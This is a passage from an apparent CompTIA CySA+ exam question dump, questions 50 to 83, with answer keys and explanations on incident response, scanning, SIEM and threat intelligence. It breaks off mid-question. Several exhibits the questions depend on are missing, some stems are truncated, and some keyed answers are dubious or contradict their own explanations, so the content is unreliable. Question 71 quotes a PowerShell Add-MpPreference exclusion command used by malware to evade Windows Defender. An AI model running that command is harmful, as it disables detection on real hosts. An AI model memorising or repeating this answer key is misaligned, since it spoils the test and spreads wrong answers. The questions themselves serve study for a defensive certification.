Which of the following should be updated after a lessons-learned review?

A. Disaster recovery plan

B. Business continuity plan
C. Tabletop exercise
D. Incident response plan

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: A lessons-learned review is a process of evaluating the effectiveness and efficiency of the
incident response plan after an incident or an exercise. The purpose of the review is to identify the
strengths and weaknesses of the incident response plan, and to update it accordingly to improve the future
performance and resilience of the organization. Therefore, the incident response plan should be updated
after a lessons-learned review. References: The answer was based on the NCSC CAF guidance from the
National Cyber Security Centre, which states: "You should use post-incident and post-exercise reviews to
actively reduce the risks associated with the same, or similar, incidents happening in future. Lessons
learned can inform any aspect of your cyber security, including: System configuration Security monitoring
and reporting Investigation procedures Containment/recovery strategies"

QUESTION 50
A manufacturer has hired a third-party consultant to assess the security of an OT network that includes
both fragile and legacy equipment.

Which of the following must be considered to ensure the consultant does no harm to operations?

A. Employing Nmap Scripting Engine scanning techniques

B. Preserving the state of PLC ladder logic prior to scanning
C. Using passive instead of active vulnerability scans
D. Running scans during off-peak manufacturing hours

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: In environments with fragile and legacy equipment, passive scanning is preferred to prevent
any potential disruptions that active scanning might cause.

When assessing the security of an Operational Technology (OT) network, especially one with fragile and
legacy equipment, it's crucial to use passive instead of active vulnerability scans. Active scanning can
sometimes disrupt the operation of sensitive or older equipment. Passive scanning listens to network traffic
without sending probing requests, thus minimizing the risk of disruption.

QUESTION 51
A security analyst has found a moderate-risk item in an organization's point-of-sale application. The
organization is currently in a change freeze window and has decided that the risk is not high enough to
correct at this time. Which of the following inhibitors to remediation does this scenario illustrate?

A. Service-level agreement
B. Business process interruption
C. Degrading functionality
D. Proprietary system

Correct Answer: B
Explanation

Explanation/Reference:
Business process interruption is the inhibitor to remediation that this scenario illustrates. Business process
interruption is when the remediation of a vulnerability or an incident requires the disruption or suspension
of a critical or essential business process, such as the point-of-sale application. This can cause
operational, financial, or reputational losses for the organization, and may outweigh the benefits of the
remediation. Therefore, the organization may decide to postpone or avoid the remediation until a more
convenient time, such as a change freeze window, which is a period of time when no changes are allowed
to the IT environment12. Service-level agreement, degrading functionality, and proprietary system are
other possible inhibitors to remediation, but they are not relevant to this scenario. Service-level agreement
is when the remediation of a vulnerability or an incident violates or affects the contractual obligations or
expectations of the service provider or the customer. Degrading functionality is when the remediation of a
vulnerability or an incident reduces or impairs the performance or usability of a system or an application.
Proprietary system is when the remediation of a vulnerability or an incident involves a system or an
application that is owned or controlled by a third party, and the organization has limited or no access or
authority to modify it3. References: Inhibitors to Remediation -- SOC Ops Simplified, Remediation
Inhibitors - CompTIA CySA+, Information security Vulnerability Management Report (Remediation...

QUESTION 52
A payroll department employee was the target of a phishing attack in which an attacker impersonated a
department director and requested that direct deposit information be updated to a new account. Afterward,
a deposit was made into the unauthorized account. Which of the following is one of the first actions the
incident response team should take when they receive notification of the attack?

A. Scan the employee's computer with virus and malware tools.

B. Review the actions taken by the employee and the email related to the event
C. Contact human resources and recommend the termination of the employee.
D. Assign security awareness training to the employee involved in the incident.

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: In case of a phishing attack, it's crucial to review what actions were taken by the employee
and analyze the phishing email to understand its nature and impact.References: CompTIA CySA+ Study
Guide: Exam CS0-003, 3rd Edition, Chapter 6, page 246; CompTIA CySA+ CS0-003 Certification Study
Guide, Chapter 6, page 255.

QUESTION 53
A security analyst is responding to an indent that involves a malicious attack on a network. Data closet.
Which of the following best explains how are analyst should properly document the incident?

A. Back up the configuration file for alt network devices

B. Record and validate each connection
C. Create a full diagram of the network infrastructure
D. Take photos of the impacted items

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: When documenting a physical incident in a network data closet, taking photos provides a
clear and immediate record of the situation, which is essential for thorough incident documentation and
subsequent investigation. Proper documentation of an incident in a data closet should include taking
photos of the impacted items. This provides visual evidence and helps in understanding the physical
context of the incident, which is crucial for a thorough investigation. Backing up configuration files,
recording connections, and creating network diagrams, while important, are not the primary means of
documenting the physical aspects of an incident.

QUESTION 54
An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary
analysis indicates that this malware disables host security services and performs cleanup routines on it
infected hosts, including deletion of initial dropper and removal of event log entries and prefetch files from
the host. Which of the following data sources would most likely reveal evidence of the root cause? (Select
two).

A. Creation time of dropper

B. Registry artifacts
C. EDR data
D. Prefetch files
E. File system metadata
F. Sysmon event log

Correct Answer: BC
Explanation

Explanation/Reference:
Explanation: Registry artifacts and EDR data are two data sources that can provide valuable information
about the root cause of a malware outbreak. Registry artifacts can reveal changes made by the malware to
the system configuration, such as disabling security services, modifying startup items, or creating
persistence mechanisms1. EDR data can capture the behavior and network activity of the malware, such
as the initial infection vector, the command and control communication, or the lateral movement2. These
data sources can help the analyst identify the malware family, the attack technique, and the threat actor
behind the outbreak.
References: Malware Analysis | CISA, Malware Analysis: Steps & Examples - CrowdStrike

QUESTION 55
Which of the following would likely be used to update a dashboard that integrates.....?

A. Webhooks
B. Extensible Markup Language
C. Threat feed combination
D. JavaScript Object Notation

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: JavaScript Object Notation (JSON) is commonly used for transmitting data in web
applications and would be suitable for updating dashboards that integrate various data sources. It's
lightweight and easy to parse and generate.

QUESTION 56
A Chief Information Security Officer wants to implement security by design, starting ...... vulnerabilities,
including SQL injection, FRI, XSS, etc. Which of the following would most likely meet the requirement?

A. Reverse engineering
B. Known environment testing
C. Dynamic application security testing
D. Code debugging
Correct Answer: C
Explanation

Explanation/Reference:
Explanation: Dynamic Application Security Testing (DAST) is used to detect vulnerabilities in running
applications, including common issues like SQL injection, FRI, XSS, etc. It aligns with the goal of
implementing security by design.

QUESTION 57
An analyst is designing a message system for a bank. The analyst wants to include a feature that allows
the recipient of a message to prove to a third party that the message came from the sender.

Which of the following information security goals is the analyst most likely trying to achieve?

A. Non-repudiation
B. Authentication
C. Authorization
D. Integrity

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: Non-repudiation ensures that a message sender cannot deny the authenticity of their sent
message. This is crucial in banking communications for legal and security reasons. The goal of allowing a
message recipient to prove the message's origin is non-repudiation. This ensures that the sender cannot
deny the authenticity of their message. Non- repudiation is a fundamental aspect of secure messaging
systems, especially in banking and financial communications.

QUESTION 58
A security team identified several rogue Wi-Fi access points during the most recent network scan. The
network scans occur once per quarter. Which of the following controls would best all ow the organization to
identity rogue devices more quickly?

A. Implement a continuous monitoring policy.

B. Implement a BYOD policy.
C. Implement a portable wireless scanning policy.
D. Change the frequency of network scans to once per month.

Correct Answer: A
Explanation

Explanation/Reference:
The best control to allow the organization to identify rogue devices more quickly is A. Implement a
continuous monitoring policy. A continuous monitoring policy is a set of procedures and tools that enable
an organization to detect and respond to unauthorized or anomalous activities on its network in real time or
near real time. A continuous monitoring policy can help identify rogue access points as soon as they
appear on the network, rather than waiting for quarterly or monthly scans. A continuous monitoring policy
can also help improve the overall security posture and compliance of the organization by providing timely
and accurate information about its network assets, vulnerabilities, threats, and incidents1.

QUESTION 59
A security analyst reviews the following Arachni scan results for a web application that stores PII data:
Which of the following should be remediated first?

A. SQL injection
B. RFI
C. XSS
D. Code injection

Correct Answer: A
Explanation

Explanation/Reference:
SQL injection should be remediated first, as it is a high-severity vulnerability that can allow an attacker to
execute arbitrary SQL commands on the database server and access, modify, or delete sensitive data,
including PII. According to the Arachni scan results, there are two instances of SQL injection and three
instances of blind SQL injection (two timing attacks and one differential analysis) in the web application.
These vulnerabilities indicate that the web application does not properly validate or sanitize the user input
before passing it to the database server, and thus exposes the database to malicious queries12. SQL
injection can have serious consequences for the confidentiality, integrity, and availability of the data and
the system, and can also lead to further attacks, such as privilege escalation, data exfiltration, or remote
code execution34. Therefore, SQL injection should be the highest priority for remediation, and the web
application should implement input validation, parameterized queries, and least privilege principle to
prevent SQL injection attacks5. References: Web application testing with Arachni | Infosec, How do I
create a generated scan report for PDF in Arachni Web ..., Command line user interface ?Arachni/arachni
Wiki ?GitHub, SQL Injection - OWASP, Blind SQL Injection - OWASP, SQL Injection Attack:
What is it, and how to prevent it., SQL Injection Cheat Sheet & Tutorial | Veracode

QUESTION 60
An organization has tracked several incidents that are listed in the following table:

Which of the following is the organization's MTTD?

A. 140
B. 150
C. 160
D. 180

Correct Answer: C
Explanation

Explanation/Reference:
The MTTD (Mean Time To Detect) is calculated by averaging the time elapsed in detecting incidents. From
the given data: (180+150+170+140)/4 = 160 minutes. This is the correct answer according to the CompTIA
CySA+ CS0-003 Certification Study Guide1, Chapter 4, page 161. References: CompTIA CySA+ Study
Guide: Exam CS0-003, 3rd Edition, Chapter 4, page 153; CompTIA CySA+ CS0-003 Certification Study
Guide, Chapter 4, page 161.

QUESTION 61
The Chief Executive Officer (CEO) has notified that a confidential trade secret has been compromised.
Which of the following communication plans should the CEO initiate?

A. Alert department managers to speak privately with affected staff.

B. Schedule a press release to inform other service provider customers of the compromise.
C. Disclose to all affected parties in the Chief Operating Officer for discussion and resolution.
D. Verify legal notification requirements of PII and SPII in the legal and human resource departments.

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The CEO should initiate an alert to department managers to speak privately with affected
staff. This is because the trade secret is confidential and should not be disclosed to the public. Additionally,
the CEO should verify legal notification requirements of PII and SPII in the legal and human resource
departments to ensure compliance with data protection laws. References: CompTIA CySA+ Study Guide:
Exam CS0-002, 2nd Edition, Chapter 4, "Data Protection and Privacy Practices", page 194; CompTIA
CySA+ Certification Exam Objectives Version 4.0, Domain 4.0 "Compliance and Assessment", Objective
4.1 "Given a scenario, analyze data as part of a security incident", Sub-objective "Data classification
levels", page 23

QUESTION 62
Which of the following best describes the importance of implementing TAXII as part of a threat intelligence
program?

A. It provides a structured way to gain information about insider threats.

B. It proactively facilitates real-time information sharing between the public and private sectors.
C. It exchanges messages in the most cost-effective way and requires little maintenance once
 implemented.
D. It is a semi-automated solution to gather threat intellbgence about competitors in the same sector.

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: The correct answer is B. It proactively facilitates real-time information sharing between the
public and private sectors.

TAXII, or Trusted Automated eXchange of Intelligence Information, is a standard protocol for sharing cyber
threat intelligence in a standardized, automated, and secure manner. TAXII defines how cyber threat
information can be shared via services and message exchanges, such as discovery, collection
management, inbox, and poll. TAXII is designed to support STIX, or Structured Threat Information
eXpression, which is a standardized language for describing cyber threat information in a readable and
consistent format. Together, STIX and TAXII form a framework for sharing and using threat intelligence,
creating an open-source platform that allows users to search through records containing attack vectors
details such as malicious IP addresses, malware signatures, and threat actors123.
The importance of implementing TAXII as part of a threat intelligence program is that it proactively
facilitates real-time information sharing between the public and private sectors. By using TAXII,
organizations can exchange cyber threat information with various entities, such as security vendors,
government agencies, industry associations, or trusted groups. TAXII enables different sharing models,
such as hub and spoke, source/subscriber, or peer-to-peer, depending on the needs and preferences of
the information producers and consumers. TAXII also supports different levels of access control,
encryption, and authentication to ensure the security and privacy of the shared information123. By
implementing TAXII as part of a threat intelligence program, organizations can benefit from the following
advantages:
They can receive timely and relevant information about the latest threats and vulnerabilities that may affect
their systems or networks. They can leverage the collective knowledge and experience of other
organizations that have faced similar or related threats.
They can improve their situational awareness and threat detection capabilities by correlating and analyzing
the shared information. They can enhance their incident response and mitigation strategies by applying the
best practices and recommendations from the shared information. They can contribute to the overall
improvement of cyber security by sharing their own insights and feedback with other organizations123.
The other options are incorrect because they do not accurately describe the importance of implementing
TAXII as part of a threat intelligence program. Option A is incorrect because TAXII does not provide a
structured way to gain information about insider threats. Insider threats are malicious activities conducted
by authorized users within an organization, such as employees, contractors, or partners. Insider threats
can be detected by using various methods, such as user behavior analysis, data loss prevention, or
anomaly detection. However, TAXII is not designed to collect or share information about insider threats
specifically. TAXII is more focused on external threats that originate from outside sources, such as
hackers, cybercriminals, or nation-states4. Option C is incorrect because TAXII does not exchange
messages in the most cost- effective way and requires little maintenance once implemented. TAXII is a
protocol that defines how messages are exchanged, but it does not specify the cost or maintenance of the
exchange. The cost and maintenance of implementing TAXII depend on various factors, such as the type
and number of services used, the volume and frequency of data exchanged, the security and reliability
requirements of the exchange, and the availability and compatibility of existing tools and platforms.
Implementing TAXII may require significant resources and efforts from both the information producers and
consumers to ensure its functionality and performance5.
Option D is incorrect because TAXII is not a semi-automated solution to gather threat intelligence about
competitors in the same sector. TAXII is a fully automated solution that enables the exchange of threat
intelligence among various entities across different sectors. TAXII does not target or collect information
about specific competitors in the same sector. Rather, it aims to foster collaboration and cooperation
among organizations that share common interests or goals in cyber security. Moreover, gathering threat
intelligence about competitors in the same sector may raise ethical and legal issues that are beyond the
scope of TAXII.
References:
1 What is STIX/TAXII? | Cloudflare
2 What Are STIX/TAXII Standards? - Anomali Resources 3 What is STIX and TAXII? - EclecticIQ
4 What Is an Insider Threat? Definition & Examples | Varonis 5 Implementing STIX/TAXII - GitHub Pages
[6] Cyber Threat Intelligence: Ethical Hacking vs Unethical Hacking | Infosec

QUESTION 63
A company has the following security requirements:

No public IPs

All data secured at rest

No insecure ports/protocols

After a cloud scan is completed, a security analyst receives reports that several misconfigurations are
putting the company at risk. Given the following cloud scanner output:

Which of the following should the analyst recommend be updated first to meet the security requirements
and reduce risks?

A. VM_PRD_DB
B. VM_DEV_DB
C. VM_DEV_Web02
D. VM_PRD_Web01

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: This VM has a public IP and an open port 80, which violates the company's security
requirements of no public IPs and no insecure ports/protocols. It also exposes the VM to potential attacks
from the internet. This VM should be updated first to use a private IP and close the port 80, or use a secure
protocol such as HTTPS. References[CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition], Chapter
2: Cloud and Hybrid Environments, page 67.[What is a Public IP Address?][What is Port 80?]

QUESTION 64
Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical
vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the
patch cannot be deployed due to planned, routine system upgrades.

Which of the following is the best method to remediate the bugs?

A. Reschedule the upgrade and deploy the patch

B. Request an exception to exclude the patch from installation
C. Update the risk register and request a change to the SLA
D. Notify the incident response team and rerun the vulnerability scan

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: When a patch cannot be deployed due to conflicting routine system upgrades, updating the
risk register and requesting a change to the Service Level Agreement (SLA) is a practical approach. It
allows for re-evaluation of the risk and adjustment of the SLA to reflect the current situation.

QUESTION 65
Which of the following techniques can help a SOC team to reduce the number of alerts related to the
internal security activities that the analysts have to triage?

A. Enrich the SIEM-ingested data to include all data required for triage.
B. Schedule a task to disable alerting when vulnerability scans are executing.
C. Filter all alarms in the SIEM with low severity.
D. Add a SOAR rule to drop irrelevant and duplicated notifications.

Correct Answer: B
Explanation

QUESTION 66
While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents
across different systems. Which of the following should be checked first?

A. If appropriate logging levels are set

B. NTP configuration on each system
C. Behavioral correlation settings
D. Data normalization rules

Correct Answer: B
Explanation

Explanation/Reference:
The NTP configuration on each system should be checked first, as it is essential for ensuring accurate and
consistent time stamps across different systems. NTP is the Network Time Protocol, which is used to
synchronize the clocks of computers over a network. NTP uses a hierarchical system of time sources,
where each level is assigned a stratum number. The most accurate time sources, such as atomic clocks or
GPS receivers, are at stratum 0, and the devices that synchronize with them are at stratum 1, and so on.
NTP clients can query multiple NTP servers and use algorithms to select the best time source and adjust
their clocks accordingly1. If the NTP configuration is not consistent or correct on each system, the time
stamps of the logs and events may differ, making it difficult to correlate incidents across different systems.
This can affect the security analysis and correlation of events, as well as the compliance and auditing of
the network23. References: How the Windows Time Service Works, Time Synchronization - All You Need
To Know, What is SIEM? | Microsoft Security

QUESTION 67
During an internal code review, software called "ACE" was discovered to have a vulnerability that allows
the execution of arbitrary code. The vulnerability is in a legacy, third-party vendor resource that is used by
the ACE software. ACE is used worldwide and is essential for many businesses in this industry.
Developers informed the Chief Information Security Officer that removal of the vulnerability will take time.
Which of the following is the first action to take?

A. Look for potential loCs in the company.

B. Inform customers of the vulnerability.
C. Remove the affected vendor resource from the ACE software.
D. Develop a compensating control until the issue can be fixed permanently.

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: A compensating control is an alternative measure that provides a similar level of protection as
the original control, but is used when the original control is not feasible or cost-effective. In this case, the
CISO should develop a compensating control to mitigate the risk of the vulnerability in the ACE software,
such as implementing additional monitoring, firewall rules, or encryption, until the issue can be fixed
permanently by the developers. References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition,
Chapter 5, page 197; CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 5, page 205.

QUESTION 68
An analyst is conducting monitoring against an authorized team that win perform adversarial techniques.
The analyst interacts with the team twice per day to set the stage for the techniques to be used. Which of
the following teams is the analyst a member of?

A. Orange team
B. Blue team
C. Red team
D. Purple team

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The correct answer is A. Orange team.

An orange team is a team that is involved in facilitation and training of other teams in cybersecurity. An
orange team assists the yellow team, which is the management or leadership team that oversees the
cybersecurity strategy and governance of an organization. An orange team helps the yellow team to
understand the cybersecurity risks and challenges, as well as the roles and responsibilities of other teams,
such as the red, blue, and purple teams12. In this scenario, the analyst is conducting monitoring against an
authorized team that will perform adversarial techniques. This means that the analyst is observing and
evaluating the performance of another team that is simulating real-world attacks against the organization's
systems or networks. This could be either a red team or a purple team, depending on whether they are
working independently or collaboratively with the defensive team345. The analyst interacts with the team
twice per day to set the stage for the techniques to be used. This means that the analyst is providing
guidance and feedback to the team on how to conduct their testing and what techniques to use. This could
also involve setting up scenarios, objectives, rules of engagement, and success criteria for the testing. This
implies that the analyst is facilitating and training the team to improve their skills and capabilities in
cybersecurity12. Therefore, based on these descriptions, the analyst is a member of an orange team,
which is involved in facilitation and training of other teams in cybersecurity. The other options are incorrect
because they do not match the role and function of the analyst in this scenario.
Option B is incorrect because a blue team is a defensive security team that monitors and protects the
organization's systems and networks from real or simulated attacks. A blue team does not conduct
monitoring against an authorized team that will perform adversarial techniques, but rather defends against
them345.
Option C is incorrect because a red team is an offensive security team that discovers and exploits
vulnerabilities in the organization's systems or networks by simulating real-world attacks. A red team does
not conduct monitoring against an authorized team that will perform adversarial techniques, but rather
performs them345. Option D is incorrect because a purple team is not a separate security team, but rather
a collaborative approach between the red and blue teams to improve the organization's overall security. A
purple team does not conduct monitoring against an authorized team that will perform adversarial
techniques, but rather works with them345.
References:
1 Infosec Color Wheel & The Difference Between Red & Blue Teams 2 The colors of cybersecurity -
UWadison Information Technology 3 Red Team vs. Blue Team vs. Purple Team Compared - U.S.
Cybersecurity 4 Red Team vs. Blue Team vs. Purple Team: What's The Difference? | Varonis 5 Red, blue,
and purple teams: Cybersecurity roles explained | Pluralsight Blog

QUESTION 69
A team of analysts is developing a new internal system that correlates information from a variety of
sources analyzes that information, and then triggers notifications according to company policy.

Which of the following technologies was deployed?

A. SIEM
B. SOAR
C. IPS
D. CERT

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: SIEM (Security Information and Event Management) technology aggregates and analyzes
activity from many different resources across your IT infrastructure. The description of correlating
information from various sources and triggering notifications aligns with the capabilities of a SIEM system.

QUESTION 70
Which of the following statements best describes the MITRE ATT&CK framework?

A. It provides a comprehensive method to test the security of applications.

B. It provides threat intelligence sharing and development of action and mitigation strategies.
C. It helps identify and stop enemy activity by highlighting the areas where an attacker functions.
D. It tracks and understands threats and is an open-source project that evolves.
E. It breaks down intrusions into a clearly defined sequence of phases.

Correct Answer: D
Explanation

Explanation/Reference:
The MITRE ATT&CK framework is a knowledge base of cybercriminals' adversarial behaviors based on
cybercriminals' known tactics, techniques and procedures (TTPs). It helps security teams model, detect,
prevent and fight cybersecurity threats by simulating cyberattacks, creating security policies, controls and
incident response plans, and sharing information with other security professionals. It is an open-source
project that evolves with input from a global community of cybersecurity professionals1. References: What
is the MITRE ATT&CK Framework? | IBM

QUESTION 71
An employee downloads a freeware program to change the desktop to the classic look of legacy Windows.
Shortly after the employee installs the program, a high volume of random DNS queries begin to originate
from the system. An investigation on the system reveals the following:

Add-MpPreference -ExclusionPath '%Program Filest\ksysconfig'

Which of the following is possibly occurring?

A. Persistence
B. Privilege escalation
C. Credential harvesting
D. Defense evasion

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: Defense evasion is the technique of avoiding detection or prevention by security tools or
mechanisms. In this case, the freeware program is likely a malware that generates random DNS queries to
communicate with a command and control server or exfiltrate data. The command Add-MpPreference -
ExclusionPath '%Program Filest\ksysconfig' is used to add an exclusion path to Windows Defender, which
is a built-in antivirus software, to prevent it from scanning the malware folder. References: CompTIA CySA
+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 5, page 204; CompTIA CySA+ CS0-003 Certification
Study Guide, Chapter 5, page 212. pr

QUESTION 72
A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will
act as a wiper. Which of the following parts of the Cyber Kill Chain does this act exhibit?
A. Reconnaissance
B. Weaponization
C. Exploitation
D. Installation

Correct Answer: B
Explanation

Explanation/Reference:
Weaponization is the stage of the Cyber Kill Chain where the attacker creates or modifies a malicious
payload to use against a target. In this case, the disgruntled open-source developer has created a logic
bomb that will act as a wiper, which is a type of malware that destroys data on a system. This is an
example of weaponization, as the developer has prepared a cyberweapon to sabotage the code
repository. References: The answer was based on the web search results from Bing, especially the
following sources:
Cyber Kill Chain?| Lockheed Martin, which states: "In the weaponization step, the adversary creates
remote access malware weapon, such as a virus or worm, tailored to one or more vulnerabilities." The
Cyber Kill Chain: The Seven Steps of a Cyberattack - EC-Council, which states: "In the weaponization
stage, all of the attacker's preparatory work culminates in the creation of malware to be used against an
identified target." What is the Cyber Kill Chain? Introduction Guide - CrowdStrike, which states:
"Weaponization: The attacker creates a malicious payload that will be delivered to the target."

QUESTION 73
Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies
regarding versions and patches in the existing infrastructure are discovered. Which of the following is the
best solution to decrease the inconsistencies?

A. Implementing credentialed scanning

B. Changing from a passive to an active scanning approach
C. Implementing a central place to manage IT assets
D. Performing agentless scanning

Correct Answer: C
Explanation

Explanation/Reference:
Implementing a central place to manage IT assets is the best solution to decrease the inconsistencies
regarding versions and patches in the existing infrastructure. A central place to manage IT assets, such as
a configuration management database (CMDB), can help the vulnerability assessment team to have an
accurate and up-to-date inventory of all the hardware and software components in the network, as well as
their relationships and dependencies. A CMDB can also track the changes and updates made to the IT
assets, and provide a single source of truth for the vulnerability assessment team and other teams to
compare and verify the versions and patches of the infrastructure12. Implementing credentialed scanning,
changing from a passive to an active scanning approach, and performing agentless scanning are all
methods to improve the vulnerability scanning process, but they do not address the root cause of the
inconsistencies, which is the lack of a central place to manage IT assets3. References: What is a
Configuration Management Database (CMDB)?, How to Use a CMDB to Improve Vulnerability
Management, Vulnerability Scanning Best Practices

QUESTION 74
An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is
to create a server image that can be deployed with a secure template. Which of the following is the best
resource to ensure secure configuration?

A. CIS Benchmarks
B. PCI DSS
C. OWASP Top Ten
D. ISO 27001

Correct Answer: A
Explanation

Explanation/Reference:
The best resource to ensure secure configuration of cloud infrastructure is A. CIS Benchmarks. CIS
Benchmarks are a set of prescriptive configuration recommendations for various technologies, including
cloud providers, operating systems, network devices, and server software. They are developed by a global
community of cybersecurity experts and help organizations protect their systems against threats more
confidently1 PCI DSS, OWASP Top Ten, and ISO 27001 are also important standards for information
security, but they are not focused on providing specific guidance for hardening cloud infrastructure. PCI
DSS is a compliance scheme for payment card transactions, OWASP Top Ten is a list of common web
application security risks, and ISO 27001 is a framework for establishing and maintaining an information
security management system. These standards may have some relevance for cloud security, but they are
not as comprehensive and detailed as CIS Benchmarks

QUESTION 75
Following an incident, a security analyst needs to create a script for downloading the configuration of all
assets from the cloud tenancy. Which of the following authentication methods should the analyst use?

A. MFA
B. User and password
C. PAM
D. Key pair

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: Key pair authentication is a method of using a public and private key to securely access cloud
resources, such as downloading the configuration of assets from a cloud tenancy. Key pair authentication
is more secure than user and password or PAM, and does not require an additional factor like MFA.
References: Authentication Methods - Configuring Tenant-Wide Settings in Azure ..., Cloud Foundation -
Oracle Help Center

QUESTION 76
A security analyst noticed the following entry on a web server log:

Warning: fopen (http://127.0.0.1:16) : failed to open stream:

Connection refused in /hj/var/www/showimage.php on line 7 Which of the following malicious activities was
most likely attempted?

A. XSS
B. CSRF
C. SSRF
D. RCE

Correct Answer: C
Explanation

Explanation/Reference:
The malicious activity that was most likely attempted is SSRF (Server-Side Request Forgery). This is a
type of attack that exploits a vulnerable web application to make requests to other resources on behalf of
the web server. In this case, the attacker tried to use the fopen function to access the local loopback
address (127.0.0.1) on port 16, which could be a service that is not intended to be exposed to the public.
The connection was refused, indicating that the port was closed or filtered. References: CompTIA CySA+
Study Guide: Exam CS0-003, 3rd Edition, Chapter 2: Software and Application Security, page 66.

QUESTION 77
Which of following would best mitigate the effects of a new ransomware attack that was not properly
stopped by the company antivirus?
A. Install a firewall.
B. Implement vulnerability management.
C. Deploy sandboxing.
D. Update the application blocklist.

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: Sandboxing is a technique that isolates potentially malicious programs or files in a controlled
environment, preventing them from affecting the rest of the system. It can help mitigate the effects of a new
ransomware attack by preventing it from encrypting or deleting important data or spreading to other
devices. References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 5, page 202;
CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 5, page 210.

QUESTION 78
A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning
project:

Must use minimal network bandwidth

Must use minimal host resources
Must provide accurate, near real-time updates
Must not have any stored credentials in configuration on the scanner

Which of the following vulnerability scanning methods should be used to best meet these requirements?

A. Internal
B. Agent
C. Active
D. Uncredentialed

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Agent-based vulnerability scanning is a method that uses software agents installed on the
target systems to scan for vulnerabilities. This method meets the requirements of the project because it
uses minimal network bandwidth and host resources, provides accurate and near real-time updates, and
does not require any stored credentials on the scanner. References: What Is Vulnerability Scanning?
Types, Tools and Best Practices, Section: Types of vulnerability scanning; CompTIA CySA+ Study Guide:
Exam CS0-003, 3rd Edition, Chapter 4: Security Operations and Monitoring, page 154.

QUESTION 79
Exploit code for a recently disclosed critical software vulnerability was publicly available (or download for
several days before being removed. Which of the following CVSS v.3.1 temporal metrics was most
impacted by this exposure?

A. Remediation level
B. Exploit code maturity
C. Report confidence
D. Availability

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Exploit code maturity in the CVSS v.3.1 temporal metrics refers to the reliability and
availability of exploit code for a vulnerability. Public availability of exploit code increases the exploit code
maturity score. The availability of exploit code affects the 'Exploit Code Maturity' metric in CVSS v.3.1. This
metric evaluates the level of maturity of the exploit that targets the vulnerability. When exploit code is
readily available, it suggests a higher level of maturity, indicating that the exploit is more reliable and easier
to use.

QUESTION 80
Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and
vulnerabilities with the likelihood and impact of occurrence?

A. Risk register
B. Vulnerability assessment
C. Penetration test
D. Compliance report

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: A risk register is a useful tool for mapping, tracking, and mitigating identified threats and
vulnerabilities with the likelihood and impact of occurrence. A risk register is a document that records the
details of all the risks identified in a project or an organization, such as their sources, causes,
consequences, probabilities, impacts, and mitigation strategies. A risk register can help the security team
to prioritize the risks based on their severity and urgency, and to monitor and control them throughout the
project or the organization's lifecycle12. A vulnerability assessment, a penetration test, and a compliance
report are all methods or outputs of identifying and evaluating the threats and vulnerabilities, but they are
not tools for mapping, tracking, and mitigating them345. References: What is a Risk Register? |
Smartsheet, Risk Register: Definition & Example, Vulnerability Assessment vs. Penetration Testing: What's
the Difference?, What is a Penetration Test and How Does It Work?, What is a Compliance Report? |
Definition, Types, and Examples

QUESTION 81
An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds
continue to work. Which of the following is the most likely reason the firewall feed stopped working?

A. The firewall service account was locked out.

B. The firewall was using a paid feed.
C. The firewall certificate expired.
D. The firewall failed open.

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The firewall certificate expired. If the firewall uses a certificate to authenticate and encrypt the
feed, and the certificate expires, the feed will stop working until the certificate is renewed or replaced. This
can affect the data enrichment process and the security analysis. References: CompTIA CySA+ Study
Guide: Exam CS0-003, 3rd Edition, Chapter 4: Security Operations and Monitoring, page 161.

QUESTION 82
An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline.
Which of the following should the analyst focus on in order to move the incident forward?

A. Impact
B. Vulnerability score
C. Mean time to detect
D. Isolation

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The analyst should focus on the impact of the events in order to move the incident forward.
Impact is the measure of the potential or actual damage caused by an incident, such as data loss, financial
loss, reputational damage, or regulatory penalties. Impact can help the analyst prioritize the events that
need to be investigated based on their severity and urgency, and allocate the appropriate resources and
actions to contain and remediate them. Impact can also help the analyst communicate the status and
progress of the incident to the stakeholders and customers, and justify the decisions and
recommendations made during the incident response12. Vulnerability score, mean time to detect, and
isolation are all important metrics or actions for incident response, but they are not the main focus for
moving the incident forward. Vulnerability score is the rating of the likelihood and severity of a vulnerability
being exploited by a threat actor. Mean time to detect is the average time it takes to discover an incident.
Isolation is the process of disconnecting an affected system from the network to prevent further damage or
spread of the incident34 . References: Incident Response:
Processes, Best Practices & Tools - Atlassian, Incident Response Metrics: What You Should Be
Measuring, Vulnerability Scanning Best Practices, How to Track Mean Time to Detect (MTTD) and Mean
Time to Respond (MTTR) to Cybersecurity Incidents, [Isolation and Quarantine for Incident Response]

QUESTION 83
Which of the following best describes the key elements of a successful information security program?

A. Business impact analysis, asset and change management, and security communication plan
B. Security policy implementation, assignment of roles and responsibilities, and information asset
classification
